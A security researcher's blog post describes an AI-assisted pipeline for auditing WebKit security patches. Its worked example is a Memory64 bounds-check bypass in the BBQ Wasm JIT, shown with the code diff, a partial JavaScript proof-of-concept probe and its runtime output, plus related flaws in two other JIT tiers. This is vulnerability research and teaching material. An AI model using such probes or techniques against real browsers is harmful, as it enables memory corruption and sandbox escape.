How I Audit Security Patches with an AI Pipeline

Posted on Sat 02 May 2026 in Thought, AI, Security Research

Most security patch auditing tools look for known vulnerability patterns. They diff a commit, grep for dangerous functions, maybe flag things that look like what last year's CVEs looked like. That works for the obvious stuff. It doesn't work for the commit that says "no behavior change" and silently fixes a bounds check bypass in a JIT compiler.

That's the commit you actually want to find.

The Problem with Summarizing Diffs

The instinct when you have an LLM is to ask it to summarize the patch. "What does this fix?" You get a paragraph that tells you what the code does, which you mostly already knew from the commit message. What you don't get is the adversarial question: what did the pre-fix code allow that the post-fix code doesn't, and can an attacker still reach that state through a path the fix didn't touch?

Those are different questions. Summarization answers the first one poorly and ignores the second entirely.

The thing that changed how I thought about this was forcing every analysis to start from a falsifiable hypothesis instead of a description.

SOUNDNESS_CLAIMS: Adversarial Hypotheses, Not Observations

Instead of asking "what does this patch do," I ask the analysis agent to produce what I call SOUNDNESS_CLAIMS. Each claim has a specific shape:

F(x): The attacker's trigger - what JS/Wasm/HTML the attacker sends
P(x-pre): What the pre-fix code does with it - the vulnerable state reached
prefixfailure: The specific failure mode - what crashes, leaks, or gets corrupted
postfixstatus: What the fix actually blocks - which line, which check

The prefixfailure field is the part that matters. It forces you to name the specific bad outcome before you look at whether the fix prevents it. If you can't name a concrete failure mode, you don't actually understand the bug yet.

Here's what that looks like on a real commit.

The Commit

d8a913bd3fe — WebKit, April 2026. Commit message: "Fix Memory64 overflow checks in BBQ" Looks like a correctness fix in the Wasm JIT.

The relevant code change, in WasmBBQJIT64.h:

// Pre-fix
if (m_info.memory(memoryIndex).isMemory64() && boundary) {
    // branchAddPtr — overflow check before bounds comparison
}
zeroExtend32ToWord(pointer, wasmScratchGPR);  // silent truncation

// Post-fix
if (m_info.memory(memoryIndex).isMemory64()) {
    if (boundary) {
        // branchAddPtr — overflow check
    }
    // ... preserves full i64 pointer
}

One character difference. The && boundary guard on the overflow check. When boundary == 0

which happens for every 1-byte operation with no offset (i32.load8_s, i32.load8_u, i32.store8) the overflow check is skipped entirely.
The code falls through to zeroExtend32ToWord(), which silently discards the upper 32 bits of a 64-bit address.

The step1-2 SOUNDNESS_CLAIM for this:

F(x): Wasm Memory64 module, i32.load8_s at address 0x100000000n (bit 32 set)
P(x-pre): BBQ JIT compiles the load, boundary = 1 + 0 - 1 = 0, isMemory64() && boundary
          evaluates false, overflow check skipped, zeroExtend32ToWord() truncates address
          to 0x00000000, load silently reads mem[0] instead of trapping
prefixfailure: OOB read - attacker reads memory[0] without OutOfBoundsMemoryAccess trap;
               for i32.store8 at 0x100000000n: wild write outside Wasm sandbox (ASan BUS crash)
postfixstatus: To be confirmed by step3 empirically

That last line is important. "To be confirmed empirically" is not a hedge - it's the contract. Source analysis of the pre-fix code is not proof. The binary might differ from the source. The code path might not be taken. You need runtime evidence.

Proving It at Runtime

The attacker agent's job is not to verify the fix works. Its job is to try to break it. Every output has to read like a failed exploit attempt, not a code review.

For this bug, the probe:

// Run: jsc --useWasmMemory64=true poc.js
// Expected: BYPASS for i32.load8_s and i32.load8_u
//           ASan BUS crash for i32.store8

const bytes = buildLoad8Module(0x2c, 0x7f); // i32.load8_s, i32 result
const mod = new WebAssembly.Module(bytes);
const inst = new WebAssembly.Instance(mod, {});

// Warm up BBQ compilation
for (let i = 0; i < 10_000; i++) inst.exports.probe(0n);

// Trigger with address 0x100000000n - bit 32 set, should be OOB on a 1-page Memory64
const result = inst.exports.probe(0x100000000n);
if (result !== undefined) print(`BYPASS [i32.load8_s]: ${result}`);

Output on the pre-fix binary:

BYPASS [i32.load8_s]: 0
BYPASS [i32.load8_u]: 0
[ASan crash on i32.store8: BUS FAULT at 0x100000000]
SAFE [i64.load8_s]: OutOfBoundsMemoryAccess (different JIT path)
SAFE [i32.load (4-byte, boundary=3)]: OutOfBoundsMemoryAccess (branchAddPtr fires)

That's not source analysis. That's the bug firing in the binary. i32.load8_s and i32.load8_u silently read mem[0] instead of trapping. i32.store8 writes to 0x100000000 - a wild write outside the Wasm sandbox. The 4-byte load is fine because boundary = 3, the guard evaluates true, and the overflow check runs correctly.

The i64.load8_* safety is the interesting part - those take a separate JIT code path in BBQ that isn't affected by the same guard condition. That's exactly the kind of thing source analysis gets wrong. You'd look at the bug and assume all 8 load variants are affected. Three of the five variants you test are safe. Runtime proof catches what reasoning misses.

LLVM Coverage as Feedback

There's a third tool beyond the crash probe and disassembly: LLVM instrumented coverage. After a probe run, you can ask which lines were actually executed and which branches were taken. This matters when the probe exits cleanly - you need to confirm whether that's because the fix blocked the attack, or because the probe never reached the patched code at all.

For a NO_BYPASS verdict to mean anything, the patched decision point has to show up as HIT in the coverage output. A probe that produces a clean exit but never executes the guard it's supposedly testing is just a broken test. The coverage pass catches that before you draw the wrong conclusion.

In practice this looks like:

=== COVERAGE DELTA ===
WasmBBQJIT64.h:113  HIT (10003 calls)  # isMemory64() branch entered
WasmBBQJIT64.h:114  HIT (10003 calls)  # boundary check evaluated
WasmBBQJIT64.h:116  HIT (3 calls)      # branchAddPtr executed (boundary > 0 cases)
WasmBBQJIT64.h:113  HIT               # zeroExtend32ToWord() reached (pre-fix: all cases)

ASan tells you the symptom. Disassembly shows you the instruction sequence. Coverage tells you which branch was actually taken on the path your probe exercised. Together they close the loop - you know what happened at runtime, not just what the source implies should have happened.

The Adjacent Unpatched Question

Every analysis ends with the same question: is this the only place this pattern exists?

For this bug, the adjacent search found that BBQ was patched but two other JIT tiers had related issues:

OMG (WasmOMGIRGenerator.cpp): used B3::Above instead of B3::AboveEqual in the multi-memory bounds check - a 1-byte off-by-one that allows an access when addr + size - 1 == memorySize exactly
IPInt (InPlaceInterpreter64.asm): the .memoryIsNotZero path compared wasmAddrReg against memorySize directly, without adding size - 1, allowing up to 7-byte OOB reads/writes on 64-bit loads

These were in separate commits. The BBQ fix didn't touch them. An audit that stopped at "BBQ is patched" would have missed both.

Then It Got Patched Without Me

Three days after I completed this analysis - April 22nd - a new WebKit commit landed: Cole Carley, "Memory64 atomic operations." It added Memory64 support for atomic ops in BBQ and, as a side effect of restructuring the same code path, fixed the boundary zero bug. The && boundary guard was gone. The fix I had just been analyzing was now in the repository.

I didn't report it. I wasn't planning to - this was research, not a disclosure. But watching the commit land independently a few days later was its own kind of signal. Someone else hit the same code path while building something new, noticed the guard condition was wrong, and fixed it. The pipeline found it first.

That doesn't make it a CVE or a disclosure or anything other than what it was: a bounds check bypass that existed in a flag-gated experimental feature, confirmed with a working exploit, scored, and then independently patched. The pipeline's job was to find it and understand it. It did.

What This Schema Actually Does

The value isn't the agent. The value is the forcing function.

Before I had this methodology, my patch auditing was inconsistent. I'd read interesting commits carefully and skim the ones that looked boring. I'd notice patterns in the ones I cared about and miss them in the ones I didn't. The pipeline forces the same quality bar on every commit that comes through. A SaferCPP housekeeping fix gets the same adversarial framing as a JIT bounds check change. Most of them close quickly at 1/10. But the 5s and 7s that surface do so because the process didn't let me stop at "looks fine."

The other thing it changed is my own ability to spot patterns. Running hundreds of commits through this framing - what's the trigger, what's the pre-fix outcome, where does the fix actually block it - builds a mental model that's different from reading CVE writeups. CVE writeups show you the polished version. The pipeline shows you the commit before anyone is sure it's interesting, and forces you to decide.

When you require prefixfailure to be a named concrete outcome before you look at the fix, you can't pattern-match your way to "looks good." You have to know what bad looks like for this specific bug, then verify the fix prevents it. That's the thing worth taking from this regardless of whether you use an agent or do it manually.

The schema spec is here. It's short - the field definitions, one worked example, and notes on what empirical proof means for different bug classes. If you're building something similar or want to adapt the format, that's the doc to start from.

If you want to compare notes, feel free to reach out.